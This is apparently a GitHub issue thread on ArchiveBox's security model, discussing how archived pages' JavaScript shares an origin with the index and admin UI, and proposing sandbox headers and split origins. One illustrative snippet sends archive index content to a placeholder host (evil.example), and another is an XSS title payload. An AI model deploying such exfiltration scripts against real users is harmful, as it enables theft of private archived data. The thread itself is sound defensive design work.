Architecture: Archived JS executes in a context shared with all other archived content (and the admin UI!) #239
I'm aware of this already. The reason I haven't immediately locked it down is that archived pages can already run arbitrary JavaScript in the context of your archive domain, so there's not much we can do to protect against that attack vector without breaking interactivity across all archived pages. If I add bleach-style XSS stripping to titles, it'll make the index page less likely to break from a UX perspective, but it doesn't make it any more secure, because archived pages can just request the index page at any time directly using JavaScript.

v0.4 is going to add some security headers that will make it more difficult for pages to use JS to access other archived pages, but it's never going to be perfect unless we have each archived page stored on its own domain.

I'm having long conversations with several people this week about the security model of ArchiveBox. It's a difficult problem, but I think we'll have to end up disabling all JavaScript in the static HTML archives and only allowing proxy replaying of WARCs if people want interactivity preserved. I'm also going to move all the filesystem stuff into hash-bucketed folders to discourage people from opening the saved HTML files directly rather than accessing them via nginx or the Django webserver, as allowing archived JS to have filesystem access is disastrously bad security.
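To make the hash-bucketing idea concrete, here is a minimal sketch (a hypothetical layout, not the project's actual scheme) of how snapshot paths could be derived so that users are nudged toward accessing snapshots through the webserver rather than directly on disk:

```python
import hashlib

def bucketed_snapshot_dir(url: str, root: str = 'archive') -> str:
    """Hypothetical hash-bucketed layout: opaque nested directories discourage
    opening saved HTML files directly via file:// (where no security headers
    apply) and encourage access through nginx or the Django webserver."""
    digest = hashlib.sha256(url.encode()).hexdigest()
    # e.g. archive/3f/a2/3fa2c4...: two levels of 2-char buckets, then the full hash
    return f'{root}/{digest[:2]}/{digest[2:4]}/{digest}'

print(bucketed_snapshot_dir('https://example.com/page'))
```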
Because this is fairly serious, I've temporarily struck out the instructions for running ArchiveBox with private data: https://github.com/pirate/ArchiveBox/wiki/Security-Overview#important-dont-use-archivebox-for-private-archived-content-right-now-as-were-in-the-middle-of-resolving-some-security-issues-with-how-js-is-executed-in-archived-content

Unfortunately my day job is getting super busy right now, so I don't know how soon I can change the design (fixing this is a big architectural change), but I think I might add a notice to the README as well to warn people that running archived pages can leak the index and content in the current state. The primary use case is archiving public pages and feeds, so it's not as bad as if it were doing private session archiving by default, but I don't want to give users a false sense of security, so we should definitely be transparent about the risks.
Hi @pirate! I know the issue is not that critical when you're using ArchiveBox only locally (like I do), because you're aware of what you're doing (supposedly, at least) when you save pages and such, but I still think some people would be happy to know there's no random JS popping up in their hoarding box :) Thanks for your time and consideration. And for sure, thanks for this awesome tool. Cheers!
Why does this only affect the title? Is it possible that this XSS opportunity exists elsewhere?
@andrewzigerelli see my comment above. A primary goal of ArchiveBox is to preserve JS and interactivity in archived pages, but that means pages necessarily have to be able to execute their own arbitrary JS. XSS-stripping titles or any of the other little metadata fields is like putting up a small picket fence to try and stop a tsunami. Why would an attacker bother going to the trouble of stuffing some XSS payload into page titles when they can just put JS on the page directly, knowing it will be executed by ArchiveBox users on a domain shared with the index and all the other pages?

(The whole traditional browser security model breaks down here: the invisible wall that stops xxxhacker.com from accessing your data on facebook.com is the same-origin policy, i.e. the fact that it lives on a different domain, but all archived pages are served from the same domain.)
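To make the attack vector above concrete, here is a hypothetical sketch (illustration only; `evil.example` is a placeholder host) of the kind of page an attacker could get a user to archive. Once the snapshot is opened, the embedded script runs on the archive's own origin, so a same-origin request for the index succeeds:

```python
# Hypothetical attacker-controlled page (illustration only). When the snapshot
# is opened, the script executes on the archive's origin, so the same-origin
# policy places no barrier between it and the archive index.
MALICIOUS_PAGE = """
<html><body>
<script>
  fetch('/index.html')                  // same origin as the archive index
    .then(r => r.text())
    .then(t => {                        // exfiltrate a sample to an attacker host
      new Image().src = 'https://evil.example/?x=' + encodeURIComponent(t.slice(0, 500));
    });
</script>
</body></html>
"""
```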
Idea h/t for encouragement from @FiloSottile, and similar to how Wikimedia and many other services isolate user-generated content: split serving into two origins, one for the admin UI and index, and one for the "dirty" archived content.

These can be mapped to separate domains/ports by the user (subdomains may still be risky; fully separate domains are likely required), but it will require adding some new config options to tune what port/domain the admin UI and the dirty content are listening on (see the sketch after this list). This would close a pretty crucial security hole where archived content can mess with the execution of extractors (and potentially run arbitrary shell scripts if it chains together a series of injection attacks).

Semi-related, using sandboxed iframes for replay: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

Extractor methods that replay JS:
Proposed behavior:
config option to enable bypassing sandboxing:
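The details of the proposed options were not preserved in this thread; as an illustration, here is a hypothetical config sketch (all option names below are invented to show the shape of the two-origin split and the sandbox escape hatch, and are not real ArchiveBox settings):

```python
# Hypothetical ArchiveBox settings sketch: every name here is invented
# for illustration and is not a real config option.
ARCHIVEBOX_CONFIG = {
    # Trusted origin: the Django admin UI and the archive index.
    'ADMIN_BIND_ADDR':   '127.0.0.1:8000',
    'ADMIN_DOMAIN':      'archive-admin.example.com',

    # Untrusted origin: raw archived snapshots ("dirty" content),
    # ideally on a fully separate domain rather than a subdomain.
    'CONTENT_BIND_ADDR': '127.0.0.1:8001',
    'CONTENT_DOMAIN':    'archive-content.example.net',

    # Escape hatch: let archived JS run unsandboxed (dangerous, off by default).
    'ALLOW_UNSANDBOXED_REPLAY': False,
}
```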
I talked about the ArchiveBox scenario with a couple of experts, and we came up with a better option than sandboxed iframes: serving the archived pages themselves with a `Content-Security-Policy: sandbox` response header. This is much more robust and convenient than detecting iframe loads. We also went through the list of security headers to pick the ones that would protect ArchiveBox pages from Spectre, too. They should involve no maintenance.
On top of that, it would still be a good idea to have the admin API on a different origin (a different subdomain is enough), and make its cookie `SameSite`. This should stop any cross-contamination between archived pages, but it won't stop them from detecting other archived pages. Fixing that might be possible, but it will require more complex server logic.
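The exact header list from that conversation was not preserved above; as an illustration, here is a minimal Django middleware sketch using the headers that are likely candidates (the `Content-Security-Policy: sandbox` approach plus cross-origin isolation headers commonly recommended against Spectre-style leaks; the `/archive/` URL prefix is an assumption):

```python
# Sketch only, not ArchiveBox's actual implementation: apply sandboxing and
# isolation headers to archived-content responses via Django middleware.
class ArchiveContentHeadersMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        response = self.get_response(request)
        if request.path.startswith('/archive/'):  # assumed prefix for snapshots
            # Sandbox the page without an <iframe sandbox> wrapper; omitting
            # allow-same-origin gives the page an opaque origin.
            response['Content-Security-Policy'] = 'sandbox allow-scripts allow-forms'
            # Cross-origin isolation headers, the usual Spectre-era mitigations.
            response['Cross-Origin-Opener-Policy'] = 'same-origin'
            response['Cross-Origin-Resource-Policy'] = 'same-origin'
            response['X-Content-Type-Options'] = 'nosniff'
        return response
```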
Hi! Sorry to post on such an old issue, just wondering if this is going to be implemented? Would love to be able to use WARC instead of SingleFile.
Describe the bug
Hi there!
There's an XSS vulnerability: if you save a page whose title contains an XSS vector, the payload executes when you open your archive's index.html.
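The reporter's payload and reproduction steps were not preserved in this thread; as an illustration of the bug class, here is a minimal sketch (not ArchiveBox's actual template code) of how an unescaped title becomes live markup in the index:

```python
from html import escape

# Hypothetical sketch of the bug class, not ArchiveBox's actual template code.
title = '<script>alert(document.domain)</script>'       # attacker-controlled page <title>

unsafe_row = f'<td class="title">{title}</td>'          # unescaped: script runs when index.html is opened
safe_row   = f'<td class="title">{escape(title)}</td>'  # escaped with html.escape(): inert text

print(unsafe_row)
print(safe_row)
```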
Steps to reproduce
Source code:
Software versions